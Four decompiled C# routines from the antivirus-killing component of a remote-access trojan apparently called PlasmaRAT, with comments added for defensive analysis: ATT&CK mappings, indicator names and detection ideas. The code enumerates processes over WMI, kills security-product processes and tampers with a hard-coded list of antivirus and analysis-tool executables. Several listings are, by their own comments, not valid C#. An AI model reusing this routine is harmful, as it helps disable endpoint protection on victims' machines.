Beispiel #1
        // Token: 0x0600004E RID: 78 RVA: 0x00005508 File Offset: 0x00003708
        /// <summary>
        /// Decompiled malware routine, annotated for defensive analysis. Tests whether a file
        /// path contains any keyword from AVKill.SearchStrings and, on the first hit, passes the
        /// path to AVKill.FuckFileName and BotKillers.KillFile.
        /// </summary>
        /// <param name="location">Executable path to test; it is lower-cased before matching.</param>
        /// <returns>
        /// true once a keyword matched and both helper calls returned without throwing.
        /// NOTE(review): <c>result</c> is never assigned on the no-match path, so this listing is
        /// not valid C# as printed; presumably the original VB.NET function relied on the implicit
        /// False return default. Confirm against the IL.
        /// </returns>
        public static bool CheckProcess(string location)
        {
            bool result;

            try
            {
                // The keyword list is one space-separated string. Its contents are not on this page,
                // so recover AVKill.SearchStrings from the sample to learn which products are targeted.
                string[] array = Strings.Split(AVKill.SearchStrings, " ", -1, CompareMethod.Binary);
                string   text  = Strings.StrConv(location.ToString(), VbStrConv.Lowercase, 0);
                foreach (string value in array)
                {
                    try
                    {
                        // Plain substring test against the whole lower-cased path: a keyword can match
                        // a directory name as well as the file name, and it is compared as stored
                        // (the keyword itself is not lower-cased here).
                        if (text.Contains(value))
                        {
                            // Neither helper body is shown on this page. Treat them as the tamper actions
                            // against the matched executable and confirm the mechanism in the sample.
                            AVKill.FuckFileName(location.ToString());
                            BotKillers.KillFile(location.ToString());
                            result = true;
                            break;
                        }
                    }
                    catch (Exception ex)
                    {
                        // Swallowed: a failure in either helper leaves no trace here, and the loop
                        // moves on to the next keyword.
                    }
                }
            }
            catch (Exception ex2)
            {
                // Swallowed: nothing is logged or rethrown, so the sample leaves no error output
                // for responders; rely on host telemetry instead.
            }
            return(result);
        }
Beispiel #2
 // Token: 0x0600004B RID: 75 RVA: 0x00005120 File Offset: 0x00003320
 /// <summary>
 /// Decompiled malware routine, annotated for defensive analysis. Entry point of the AVKill
 /// component: when AntiEverything.IsAdmin() is false it calls CheckAV.RunAVAdminMode(), otherwise
 /// it runs the directory searches, the running-process sweep and a fixed list of
 /// AVKill.FuckFileName calls against security-tool image names.
 /// </summary>
 /// <remarks>
 /// Behaviour matches MITRE ATT&amp;CK T1562.001 (Impair Defenses: Disable or Modify Tools).
 /// The hard-coded image names below are usable as static string indicators for this sample.
 /// None of the called helpers (searchav, ProtectMyFile, FuckFileName, RunAVAdminMode) is shown
 /// on this page.
 /// </remarks>
 public static void Start()
 {
     try
     {
         if (!AntiEverything.IsAdmin())
         {
             // Non-admin path: everything else in this method is skipped. The helper name suggests
             // an elevation attempt; confirm from its body.
             CheckAV.RunAVAdminMode();
         }
         else
         {
             // Two directory roots are passed to searchav: %PROGRAMDATA% and the Program Files folder.
             AVKill.searchav(Environment.GetEnvironmentVariable("PROGRAMDATA"));
             AVKill.ProtectMyFile();
             AVKill.searchav(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles));
             AVKill.AVProcSearcher();
             // rstrui.exe is the Windows System Restore UI; the remaining names appear to be
             // antivirus, anti-malware and analysis-tool images (Avast, Malwarebytes, Avira, AVG,
             // ESET, ZoneAlarm, Bitdefender, Kaspersky, Microsoft Defender / Security Essentials,
             // Spybot, HijackThis, ComboFix, Wireshark, KeyScrambler). The vendor mapping is inferred
             // from file names only. Hunting hint: one process referencing this many security-product
             // image names in a short window is a strong tampering signal.
             AVKill.FuckFileName("rstrui.exe");
             AVKill.FuckFileName("AvastSvc.exe");
             AVKill.FuckFileName("avconfig.exe");
             AVKill.FuckFileName("AvastUI.exe");
             AVKill.FuckFileName("avscan.exe");
             AVKill.FuckFileName("instup.exe");
             AVKill.FuckFileName("mbam.exe");
             AVKill.FuckFileName("mbamgui.exe");
             AVKill.FuckFileName("mbampt.exe");
             AVKill.FuckFileName("mbamscheduler.exe");
             AVKill.FuckFileName("mbamservice.exe");
             AVKill.FuckFileName("hijackthis.exe");
             AVKill.FuckFileName("spybotsd.exe");
             AVKill.FuckFileName("ccuac.exe");
             AVKill.FuckFileName("avcenter.exe");
             AVKill.FuckFileName("avguard.exe");
             AVKill.FuckFileName("avgnt.exe");
             AVKill.FuckFileName("avgui.exe");
             AVKill.FuckFileName("avgcsrvx.exe");
             AVKill.FuckFileName("avgidsagent.exe");
             AVKill.FuckFileName("avgrsx.exe");
             AVKill.FuckFileName("avgwdsvc.exe");
             AVKill.FuckFileName("egui.exe");
             AVKill.FuckFileName("zlclient.exe");
             AVKill.FuckFileName("bdagent.exe");
             AVKill.FuckFileName("keyscrambler.exe");
             AVKill.FuckFileName("avp.exe");
             AVKill.FuckFileName("wireshark.exe");
             AVKill.FuckFileName("ComboFix.exe");
             AVKill.FuckFileName("MSASCui.exe");
             AVKill.FuckFileName("MpCmdRun.exe");
             AVKill.FuckFileName("msseces.exe");
             AVKill.FuckFileName("MsMpEng.exe");
             AVKill.FuckFileName("blindman.exe");
             AVKill.FuckFileName("SDFiles.exe");
             AVKill.FuckFileName("SDMain.exe");
             AVKill.FuckFileName("SDWinSec.exe");
         }
     }
     catch (Exception ex)
     {
         // Swallowed. One try covers the whole method, so an exception escaping any call above
         // skips every call after it without any error output.
     }
 }
Beispiel #3
 // Token: 0x0600004F RID: 79 RVA: 0x000055B0 File Offset: 0x000037B0
 /// <summary>
 /// Decompiled malware routine, annotated for defensive analysis. Enumerates every running
 /// process through a late-bound WMI query, filters on the executable path, and terminates each
 /// process for which AVKill.CheckProcess returns true.
 /// </summary>
 /// <remarks>
 /// Relevant ATT&amp;CK techniques: T1047 (Windows Management Instrumentation), T1057 (Process
 /// Discovery) and T1562.001 (Impair Defenses: Disable or Modify Tools). Detection ideas: a
 /// Win32_Process WMI query followed by terminations of security-product processes, and
 /// security services stopping unexpectedly.
 /// </remarks>
 public static void AVProcSearcher()
 {
     try
     {
         string value = "Program Files";
         try
         {
             // Late-bound VB runtime call: GetObject("winmgmts:") followed by
             // ExecQuery("Select * from Win32_Process"), so the WMI types do not appear as static
             // references in the assembly metadata.
             foreach (object obj in ((IEnumerable)NewLateBinding.LateGet(Interaction.GetObject("winmgmts:", null), null, "ExecQuery", new object[]
             {
                 "Select * from Win32_Process"
             }, null, null, null)))
             {
                 object objectValue = RuntimeHelpers.GetObjectValue(obj);
                 // Filter: the path must contain "Program Files" or "ProgramData", must NOT contain
                 // PlasmaRAT.InstallationOfEverything (presumably the malware's own install location;
                 // confirm), and must differ from this process's own Application.ExecutablePath.
                 // ExecutablePath is re-read through late binding for every sub-expression.
                 if ((NewLateBinding.LateGet(objectValue, null, "ExecutablePath", new object[0], null, null, null).ToString().Contains(value) | NewLateBinding.LateGet(objectValue, null, "ExecutablePath", new object[0], null, null, null).ToString().Contains("ProgramData")) && !NewLateBinding.LateGet(objectValue, null, "executablepath", new object[0], null, null, null).ToString().Contains(PlasmaRAT.InstallationOfEverything) && Operators.CompareString(NewLateBinding.LateGet(objectValue, null, "executablepath", new object[0], null, null, null).ToString(), Application.ExecutablePath, false) != 0)
                 {
                     try
                     {
                         try
                         {
                             // CheckProcess acts on the file path first; only when it reports a keyword
                             // hit is the live process terminated by its WMI ProcessID.
                             if (AVKill.CheckProcess(Conversions.ToString(NewLateBinding.LateGet(objectValue, null, "ExecutablePath", new object[0], null, null, null))))
                             {
                                 Process.GetProcessById(Conversions.ToInteger(NewLateBinding.LateGet(objectValue, null, "ProcessID", new object[0], null, null, null))).Kill();
                             }
                         }
                         catch (Exception ex)
                         {
                             // Swallowed: a failed termination (for example, access denied) is ignored.
                         }
                     }
                     catch (Exception ex2)
                     {
                     }
                 }
             }
         }
         finally
         {
             // Decompiler artefact: `enumerator` is declared here and never assigned, so this block
             // is not valid C# as printed. It presumably stands for disposal of the foreach
             // enumerator in the original IL.
             IEnumerator enumerator;
             if (enumerator is IDisposable)
             {
                 (enumerator as IDisposable).Dispose();
             }
         }
     }
     catch (Exception ex3)
     {
         // Swallowed: any failure of the WMI query or the enumeration ends the sweep silently.
     }
 }
Beispiel #4
        // Token: 0x0600004A RID: 74 RVA: 0x0000508C File Offset: 0x0000328C
        /// <summary>
        /// Decompiled malware routine, annotated for defensive analysis. Event handler with the
        /// FileSystemWatcher "Created" signature: for each newly created file it calls
        /// AVKill.CheckFileforAV with the file's full path.
        /// </summary>
        /// <remarks>
        /// The labels, the num/num2/num4 bookkeeping and the ProjectData calls are decompiler output
        /// for VB.NET unstructured error handling (this looks like "On Error Resume Next"; confirm
        /// against the IL). The listing is not valid C#: <c>@switch(...)</c> and <c>endfilter(...)</c>
        /// are decompiler placeholders and <c>obj2</c> is never declared. The only payload statement
        /// is the CheckFileforAV call. Which directory the watcher monitors, and what CheckFileforAV
        /// does, are not shown on this page.
        /// </remarks>
        /// <param name="sender">Event source; unused in this body.</param>
        /// <param name="e">Event data; only e.FullPath is read.</param>
        private static void FileSystemWatcher1_Created(object sender, FileSystemEventArgs e)
        {
            int    num;
            int    num4;
            object obj;

            try
            {
IL_00:
                ProjectData.ClearProjectError();
                num = 1;
IL_07:
                int num2 = 2;
                // Payload: hand the path of the newly created file to the AV-matching logic.
                AVKill.CheckFileforAV(e.FullPath);
IL_14:
                goto IL_6F;
IL_16:
                int num3 = num4 + 1;
                num4     = 0;
                // Decompiler placeholder for a jump table over the IL labels (resume dispatch).
                @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_30:
                goto IL_64;
IL_32:
                num4 = num2;
                @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
                IL_42 :;
            }
            catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
            {
                // Exception filter rendered as pseudo-code: any Exception raised while the handler is
                // armed (num != 0) and not already resuming (num4 == 0) jumps back into the dispatch.
                Exception ex = (Exception)obj2;

                goto IL_32;
            }
IL_64:
            // -2146828237 is 0x800A0033; it is reached only through the resume dispatch at IL_30.
            throw ProjectData.CreateProjectError(-2146828237);
IL_6F:
            if (num4 != 0)
            {
                ProjectData.ClearProjectError();
            }
        }